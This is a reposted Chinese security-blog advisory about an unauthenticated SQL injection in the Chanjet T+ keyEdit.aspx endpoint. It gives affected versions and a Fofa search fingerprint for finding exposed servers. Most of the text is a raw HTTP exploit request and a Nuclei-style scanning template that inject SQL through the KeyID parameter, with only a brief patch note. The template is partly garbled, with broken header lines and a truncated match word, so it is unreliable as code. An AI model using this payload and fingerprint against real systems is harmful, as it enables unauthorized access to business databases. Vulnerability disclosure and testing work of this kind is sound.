畅捷通是用友集团的成员企业,致力于为企业提供高效、方便的解决方案。好生意是畅捷通公司的产品,能够从不同的维度帮助企业提升效率、降低成本。
漏洞介绍 | 畅捷通TPlus keyEdit.aspx SQL注入漏洞 |
---|---|
漏洞描述 | 畅捷通T+是⼀款企业管理软件,主要⾯向中⼩企业。它提供了包括财务、采购、销售、库存、⽣产制造、⼈⼒资源等在内的全⾯企业管理解决⽅案。通过畅捷通T+,企业可以实现对业务流程的数字化管理,提⾼⼯作效率,降低成本,增强企业竞争⼒。
畅捷通T+ /tplus/UFAQD/keyEdit.aspx接⼝处未对⽤⼾的输⼊进⾏过滤和校验,未经⾝份验证的攻击者可以利⽤SQL注⼊漏洞获取数据库中的信息。 |
影响产品 | 畅捷通T+ |
修复方案 | 请使⽤此产品的⽤⼾尽快打补丁或更新到最新版本:https://www.chanjet.com |
影响版本:
畅捷通 T+ 13.0
畅捷通 T+ 16.0
Fofa指纹
app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20sys.fn_varbintohexstr(hashbytes(%27MD5%27,%27123456%27)))%20--&preload=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: ASP.NET_SessionId=t5b4ib4lqdfdo5h40mpp5djc
Upgrade-Insecure-Requests: 1
Priority: u=1
Pragma: no-cache
Cache-Control: no-cache
id: changjietong_keyEdit_sqli
info:
name: changjietong_keyEdit_sqli
author: recjl
severity: high
description: description
reference:
https://
tags: tags
requests:
raw:
|+
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: {{Hostname}}
max-age=0 :
1 :
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http:///tplus/
gzip, deflate, br :
zh-CN,zh;q=0.9 :
Cookie: ASP.NET_SessionId=wla51k11mgrzdaydypk0muzb
W/"5b450e7e-666d" :
Tue, 10 Jul 2018 19:52:30 GMT :
Connection: close
and :
matchers:
type: word
part: body
words:
ion:u
type: status
status:
- 200
获取更多的网络安全热讯或者学习交流可以加入群聊!!
原文始发于微信公众号(月落安全):【新洞!】畅捷通TPlus keyEdit.aspx SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论